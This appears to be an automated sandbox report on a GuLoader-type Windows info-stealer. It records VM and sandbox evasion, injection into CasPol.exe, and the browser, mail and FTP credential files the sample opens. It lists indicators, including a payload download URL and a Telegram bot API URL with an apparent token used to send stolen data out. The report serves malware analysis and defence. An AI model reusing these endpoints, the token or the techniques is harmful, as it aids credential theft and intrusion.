            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9736726497.00000000006C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE=
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9740903132.00000000033F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9740903132.00000000033F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9736726497.00000000006C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE-
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3896Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3896Thread sleep time: -73680000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5380Thread sleep time: -70000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3896Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3896Thread sleep time: -380000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3896Thread sleep time: -58532s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: threadDelayed 2456
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: threadDelayed 760
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\libpcre-1.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MpCommu.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lang-1034.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\libfreetype-6.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B2013 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeAPI call chain: ExitProcess graph end node
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9741588774.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9741588774.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9736726497.00000000006C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe=
            Source: CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9736726497.00000000006C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe-
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9741588774.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9741588774.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9741588774.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000004.00000002.14445156063.0000000001184000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14444614539.000000000112B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9740903132.00000000033F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9741588774.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9741588774.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9741588774.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9740903132.00000000033F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v2.0.50727\caspol.exewindir=\syswow64\iertutil.dll
            Source: CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_0040290B FindFirstFileW,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_0040699E FindFirstFileW,FindClose,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeSystem information queried: ModuleInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_716A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032C173F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B9FF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032BA263 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032BA263 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B9A77 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032BA288 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032BA144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032BFD57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032BA1B6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032BA428 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032BA030 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032BA05B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032BA0F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032C04C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B2013 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_1D4A5AA0 LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe base: F00000
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2696, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2696, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Source: Yara matchFile source: 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2696, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2696, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2696, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            3
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Web Service
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            Native API
            1
            Windows Service
            1
            Access Token Manipulation
            1
            Obfuscated Files or Information
            11
            Input Capture
            117
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            Exfiltration Over Bluetooth2
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)1
            Windows Service
            1
            DLL Side-Loading
            1
            Credentials in Registry
            331
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            Automated Exfiltration11
            Encrypted Channel
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)111
            Process Injection
            241
            Virtualization/Sandbox Evasion
            NTDS1
            Process Discovery
            Distributed Component Object Model11
            Input Capture
            Scheduled Transfer3
            Non-Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Access Token Manipulation
            LSA Secrets241
            Virtualization/Sandbox Evasion
            SSH2
            Clipboard Data
            Data Transfer Size Limits114
            Application Layer Protocol
            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common111
            Process Injection
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            SecuriteInfo.com.generic.ml.22865.exe9%VirustotalBrowse
            SecuriteInfo.com.generic.ml.22865.exe6%MetadefenderBrowse
            SecuriteInfo.com.generic.ml.22865.exe19%ReversingLabsWin32.Downloader.GuLoader
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\MpCommu.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\MpCommu.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\lang-1034.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\lang-1034.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\libfreetype-6.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\libpcre-1.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\libpcre-1.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsr150B.tmp\System.dll3%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\nsr150B.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            SourceDetectionScannerLabelLink
            fides-kenya.com0%VirustotalBrowse
            www.fides-kenya.com0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://V58nqJBvA8Uitwi1EyuW.com0%Avira URL Cloudsafe
            http://hqQZjN.com0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%Avira URL Cloudsafe
            http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%Avira URL Cloudsafe
            http://www.avast.com0/0%Avira URL Cloudsafe
            http://www.fides-kenya.com/yem/wam.bin0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            fides-kenya.com
            5.9.197.244
            truetrueunknown
            api.telegram.org
            149.154.167.220
            truefalse
              high
              www.fides-kenya.com
              unknown
              unknowntrueunknown
              NameMaliciousAntivirus DetectionReputation
              http://www.fides-kenya.com/yem/wam.bintrue
              • Avira URL Cloud: safe
              unknown
              https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocumentfalse
                high
                NameSourceMaliciousAntivirus DetectionReputation
                http://127.0.0.1:HTTP/1.1CasPol.exe, 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://V58nqJBvA8Uitwi1EyuW.comCasPol.exe, 00000004.00000002.14467253332.000000001D621000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.9740041211.000000001C441000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14468117275.000000001D6D0000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://creativecommons.org/licenses/by-sa/4.0/network-server.png.1.drfalse
                  high
                  https://api.telegram.orgCasPol.exe, 00000004.00000002.14467843631.000000001D698000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousSecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, MpCommu.dll.1.drfalse
                      high
                      https://api.telegram.org/CasPol.exe, 00000004.00000002.14444961038.0000000001165000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://hqQZjN.comCasPol.exe, 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://support.google.com/chrome/?p=plugin_flashCasPol.exe, 00000004.00000002.14472003206.000000001DA5D000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.avast.com0/SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://scripts.sil.org/OFLSourceSecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, SourceCodePro-Black.otf.1.drfalse
                            high
                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdSecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, MpCommu.dll.1.drfalse
                              high
                              http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.generic.ml.22865.exefalse
                                high
                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigestSecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, MpCommu.dll.1.drfalse
                                  high
                                  https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocumentdocument-----CasPol.exe, 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    149.154.167.220
                                    api.telegram.orgUnited Kingdom
                                    62041TELEGRAMRUfalse
                                    5.9.197.244
                                    fides-kenya.comGermany
                                    24940HETZNER-ASDEtrue
                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:634596
                                    Start date and time: 26/05/202214:12:582022-05-26 14:12:58 +02:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 13m 21s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:SecuriteInfo.com.generic.ml.22865.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                    Run name:Suspected Instruction Hammering
                                    Number of analysed new started processes analysed:23
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@4/16@2/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HDC Information:
                                    • Successful, ratio: 26.6% (good quality ratio 26%)
                                    • Quality average: 88.9%
                                    • Quality standard deviation: 21.2%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                    • TCP Packets have been reduced to 100
                                    • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    TimeTypeDescription
                                    14:14:52API Interceptor1x Sleep call for process: SecuriteInfo.com.generic.ml.22865.exe modified
                                    14:15:22API Interceptor3268x Sleep call for process: CasPol.exe modified
                                    No context
                                    No context
                                    No context
                                    No context
                                    No context
                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe
